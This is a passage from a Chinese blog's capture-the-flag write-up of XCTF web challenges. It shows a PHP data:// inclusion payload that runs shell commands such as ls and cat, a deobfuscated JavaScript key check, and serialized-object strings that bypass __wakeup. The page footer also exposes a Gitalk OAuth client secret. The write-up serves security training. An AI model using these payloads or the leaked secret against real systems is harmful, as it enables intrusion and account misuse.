<pre class="line-numbers language-bash" data-language="bash"><code class="language-bash">?page<span class="token operator">=</span>data://text/plain,<span class="token operator">&lt;</span>?php system<span class="token punctuation">(</span><span class="token string">'ls'</span><span class="token punctuation">)</span><span class="token punctuation">;</span> ?<span class="token operator">></span><span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p>得fl4gisisish3r3.php</p>
<pre class="line-numbers language-bash" data-language="bash"><code class="language-bash">?page<span class="token operator">=</span>data://text/plain,<span class="token operator">&lt;</span>?php system<span class="token punctuation">(</span><span class="token string">'cat fl4gisisish3r3.php'</span><span class="token punctuation">)</span><span class="token punctuation">;</span> ?<span class="token operator">></span><span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p>查看源代码得flag</p>
<p>方法二：大小写绕过</p>
<h3 id="NaNNaNNaNNaN-Batman"><a href="#NaNNaNNaNNaN-Batman" class="headerlink" title="NaNNaNNaNNaN-Batman"></a>NaNNaNNaNNaN-Batman</h3><p>题目描述：<br>附件 打开文件可以发现是一段javascript代码，并且包含大量控制字符<br>改后缀.html<br>将代码中的eval()函数换成alert()可将js代码完整显示出来<br>整理得：</p>
<pre class="line-numbers language-bash" data-language="bash"><code class="language-bash"><span class="token keyword">function</span> <span class="token punctuation">$(</span><span class="token punctuation">)</span> <span class="token punctuation">&#123;</span>
  var e <span class="token operator">=</span> document.getElementById<span class="token punctuation">(</span><span class="token string">'c'</span><span class="token punctuation">)</span>.value<span class="token punctuation">;</span>
  <span class="token keyword">if</span> <span class="token punctuation">(</span>e.length <span class="token operator">==</span> <span class="token number">16</span><span class="token punctuation">)</span> <span class="token punctuation">&#123;</span>    长度为16
    <span class="token keyword">if</span> <span class="token punctuation">(</span>e.match<span class="token punctuation">(</span>/^be0f23/<span class="token punctuation">)</span> <span class="token operator">!=</span> null<span class="token punctuation">)</span> <span class="token punctuation">&#123;</span>   以be0f23开头
      <span class="token keyword">if</span> <span class="token punctuation">(</span>e.match<span class="token punctuation">(</span>/233ac/<span class="token punctuation">)</span> <span class="token operator">!=</span> null<span class="token punctuation">)</span> <span class="token punctuation">&#123;</span>   包含233ac
        <span class="token keyword">if</span> <span class="token punctuation">(</span>e.match<span class="token punctuation">(</span>/e98aa$/<span class="token punctuation">)</span> <span class="token operator">!=</span> null<span class="token punctuation">)</span> <span class="token punctuation">&#123;</span>    以e98aa结尾
          <span class="token keyword">if</span> <span class="token punctuation">(</span>e.match<span class="token punctuation">(</span>/c7be9/<span class="token punctuation">)</span> <span class="token operator">!=</span> null<span class="token punctuation">)</span> <span class="token punctuation">&#123;</span>   包含c7be9
            var t <span class="token operator">=</span> <span class="token punctuation">[</span><span class="token string">'fl'</span>, <span class="token string">'s_a'</span>, <span class="token string">'i'</span>, <span class="token string">'e&#125;'</span><span class="token punctuation">]</span><span class="token punctuation">;</span>
            var n <span class="token operator">=</span> <span class="token punctuation">[</span><span class="token string">'a'</span>, <span class="token string">'_h0l'</span>, <span class="token string">'n'</span><span class="token punctuation">]</span><span class="token punctuation">;</span>
            var r <span class="token operator">=</span> <span class="token punctuation">[</span><span class="token string">'g&#123;'</span>, <span class="token string">'e'</span>, <span class="token string">'_0'</span><span class="token punctuation">]</span><span class="token punctuation">;</span>
            var i <span class="token operator">=</span> <span class="token punctuation">[</span><span class="token string">'it\'</span>', <span class="token string">'_'</span>, <span class="token string">'n'</span><span class="token punctuation">]</span><span class="token punctuation">;</span>
            var s <span class="token operator">=</span> <span class="token punctuation">[</span>t, n, r, i<span class="token punctuation">]</span><span class="token punctuation">;</span>
            <span class="token keyword">for</span> <span class="token punctuation">(</span>var o <span class="token operator">=</span> <span class="token number">0</span><span class="token punctuation">;</span> o <span class="token operator">&lt;</span> <span class="token number">13</span><span class="token punctuation">;</span> ++o<span class="token punctuation">)</span> <span class="token punctuation">&#123;</span>
              document.write<span class="token punctuation">(</span>s<span class="token punctuation">[</span>o % <span class="token number">4</span><span class="token punctuation">]</span><span class="token punctuation">[</span><span class="token number">0</span><span class="token punctuation">]</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
              s<span class="token punctuation">[</span>o % <span class="token number">4</span><span class="token punctuation">]</span>.splice<span class="token punctuation">(</span><span class="token number">0</span>, <span class="token number">1</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
            <span class="token punctuation">&#125;</span>
          <span class="token punctuation">&#125;</span>
        <span class="token punctuation">&#125;</span>
      <span class="token punctuation">&#125;</span>
    <span class="token punctuation">&#125;</span>
  <span class="token punctuation">&#125;</span>
<span class="token punctuation">&#125;</span>
document.write<span class="token punctuation">(</span><span class="token string">'&lt;input id="c">&lt;button onclick=$()>Ok&lt;/button>'</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
delete _<span class="token punctuation">;</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p>即be0f233ac7be98aa</p>
<p>改回eval(),将字符串输入文本框即可获得flag</p>
<h3 id="unserialize3"><a href="#unserialize3" class="headerlink" title="unserialize3"></a>unserialize3</h3><p>题目描述：</p>
<pre class="line-numbers language-bash" data-language="bash"><code class="language-bash">class xctf<span class="token punctuation">&#123;</span>
public <span class="token variable">$flag</span> <span class="token operator">=</span> <span class="token string">'111'</span><span class="token punctuation">;</span>
public <span class="token keyword">function</span> <span class="token function-name function">__wakeup</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">&#123;</span>
exit<span class="token punctuation">(</span><span class="token string">'bad requests'</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token punctuation">&#125;</span>
?code<span class="token operator">=</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>




<p>O:4:”xctf”:1:{s:4:”flag”;s:3:”111”;}<br>O:4:”xctf”:2:{s:4:”flag”;s:3:”111”;}</p>
<h3 id="Web-python-template-injection"><a href="#Web-python-template-injection" class="headerlink" title="Web_python_template_injection"></a>Web_python_template_injection</h3><p>SSTI</p>

        
            <div id="toc-article">
                
  <div class="widget-wrap" id="toc-wrap">
    <h3 class="widget-title"><i class="fa fa-toc"></i> 文章目录</h3>
    <div class="widget">
      <ol class="toc"><li class="toc-item toc-level-3"><a class="toc-link" href="#baby-web"><span class="toc-text">baby_web</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#warmup"><span class="toc-text">warmup</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Training-WWW-Robots"><span class="toc-text">Training-WWW-Robots</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#PHP2"><span class="toc-text">PHP2</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Web-php-unserialize"><span class="toc-text">Web_php_unserialize</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#PHP-RCE"><span class="toc-text">PHP_RCE</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Web-php-include"><span class="toc-text">Web_php_include</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#NaNNaNNaNNaN-Batman"><span class="toc-text">NaNNaNNaNNaN-Batman</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#unserialize3"><span class="toc-text">unserialize3</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Web-python-template-injection"><span class="toc-text">Web_python_template_injection</span></a></li></ol>
    </div>
  </div>


            </div>
        
        
          <blockquote id="copyright">
              <p>原文链接: <a href="http://auzc.github.io/2022/01/13/攻防世界-进阶区/">http://auzc.github.io/2022/01/13/攻防世界-进阶区/</a></p>
              <p>版权声明: 转载请注明出处.</p>
          </blockquote>
        
      
    </div>
    <footer class="article-footer">
      
        <div class="article-tag-wrap">
          

          
  <ul class="article-tag-list" itemprop="keywords"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/CTF/" rel="tag">CTF</a></li></ul>

          
    <div class="social-share">
      <span>分享到:</span>
    </div>



        </div>
      
      
        
<nav id="article-nav">
  
    <a href="/2022/01/15/LeetCode/" id="article-nav-newer" class="article-nav-link-wrap">
      <strong class="article-nav-caption">newer</strong>
      <div class="article-nav-title">
        
          LeetCode
        
      </div>
    </a>
  
  
    <a href="/2022/01/09/%E6%94%BB%E9%98%B2%E4%B8%96%E7%95%8C-%E6%96%B0%E6%89%8B%E5%8C%BA/" id="article-nav-older" class="article-nav-link-wrap">
      <strong class="article-nav-caption">older</strong>
      <div class="article-nav-title">攻防世界-新手区</div>
    </a>
  
</nav>

      
      
        
  <div id="comments"></div>








      
    </footer>
  </div>
</article>
</section>
        
          <aside id="sidebar">
  
    
  <div class="widget-wrap">
    <h3 class="widget-title"><i class="fa fa-posts"></i> 最新文章</h3>
    <div class="widget">
      <ul>
        
          <li>
            <a href="/2022/04/24/Android%E5%BC%80%E5%8F%91%E7%AC%94%E8%AE%B0/">Android开发笔记</a>
          </li>
        
          <li>
            <a href="/2022/04/20/Andriod%E5%BC%80%E5%8F%91%E6%97%A5%E8%AE%B0/">Andriod开发日记</a>
          </li>
        
          <li>
            <a href="/2022/04/20/hello-blogs/">Hexo博客教程（备用）</a>
          </li>
        
          <li>
            <a href="/2022/02/28/AcWing/">AcWing</a>
          </li>
        
          <li>
            <a href="/2022/02/06/C-%E5%B0%8F%E8%AE%B0/">C++复习</a>
          </li>
        
      </ul>
    </div>
  </div>


  
    

  
    
  <div class="widget-wrap">
    <h3 class="widget-title"><i class="fa fa-archive"></i> 归档</h3>
    <div class="widget">
      <ul class="archive-list"><li class="archive-list-item"><a class="archive-list-link" href="/archives/2022/">2022年04月</a><span class="archive-list-count">13</span></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title"><i class="fa fa-tag"></i> 标签</h3>
    <div class="widget">
      <ul class="tag-list" itemprop="keywords"><li class="tag-list-item"><a class="tag-list-link" href="/tags/Andriod/" rel="tag">Andriod</a><span class="tag-list-count">2</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/C/" rel="tag">C++</a><span class="tag-list-count">3</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/CTF/" rel="tag">CTF</a><span class="tag-list-count">7</span></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title"><i class="fa fa-link"></i>
      友情链接
    </h3>
    <div class="widget">
      <ul>
        
          <li>
            <a target="_blank" rel="noopener" href="http://i-ron.cn/">
              师傅
            </a>
          </li>
          
      </ul>
    </div>
  </div>
  
  
</aside>
        
      </div>
      <a id="totop" href="#top"></a>
      <footer id="footer">
  
  <div class="outer">
    <div id="footer-info" class="inner">
      <p>
        <a href="/sitemap.xml">网站地图</a>
        <span> | </span><a href="/atom.xml">订阅本站</a>
        <span> | </span><a href="/about/">联系博主</a>
      </p>
      
        <p>
          <i class="fa fa-visitors"></i>
          <i id="busuanzi_container_site_uv"><i id="busuanzi_value_site_uv"></i></i>
          ，
          <i class="fa fa-views"></i>
          <i id="busuanzi_container_site_pv"><i id="busuanzi_value_site_pv"></i></i>
        </p>
      
      <p>
        <span>Copyright &copy; 2022 Auzc.</span>
        <span>Theme by <a href="https://github.com/chaooo/hexo-theme-BlueLake/" target="_blank">BlueLake.</a></span>
        
            <span>Count by <a href="http://busuanzi.ibruce.info/" target="_blank">busuanzi.</a></span>
        
        <span>Powered by <a href="https://hexo.io/" target="_blank">Hexo.</a></span>
      </p>
    </div>
  </div>
</footer>

    </div>
    
<script src="/js/jquery-3.4.1.min.js"></script>


<script src="/js/search.json.js"></script>


  
<script src="/fancybox/jquery.fancybox.min.js"></script>




<script src="/js/script.js"></script>






  
<script src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>



  
<script src="/localshare/js/social-share.js"></script>

  
<script src="/localshare/js/qrcode.js"></script>





  
<script src="https://unpkg.com/gitalk/dist/gitalk.min.js"></script>

  
<script src="//cdn.bootcss.com/blueimp-md5/2.10.0/js/md5.js"></script>

  <script>
    var gitalk = new Gitalk({
      clientID: 'ad802f0b906bf1885606',
      clientSecret: '0e103ea36fc14b61fa612773e7c8e4d611d6cf30',
      repo: 'Gitalk',
      owner: 'Auzc',
      admin: ['Auzc'],
      id: md5(window.location.pathname),
      distractionFreeMode: false,
      language: 'zh-CN',
      pagerDirection: 'last'
    });
    gitalk.render('comments');
  </script>
















  </div>
<script src="/live2dw/lib/L2Dwidget.min.js?51b09a3af6e566628ae1b6287f877a23"></script><script>L2Dwidget.init({"pluginModelPath":"assets/","model":{"jsonPath":"/live2dw/assets/tororo.model.json"},"display":{"position":"right","width":300,"height":600},"mobile":{"show":false},"rect":"opacity:0.7","log":false,"pluginJsPath":"lib/","pluginRootPath":"live2dw/","tagMode":false});</script></body>
</html>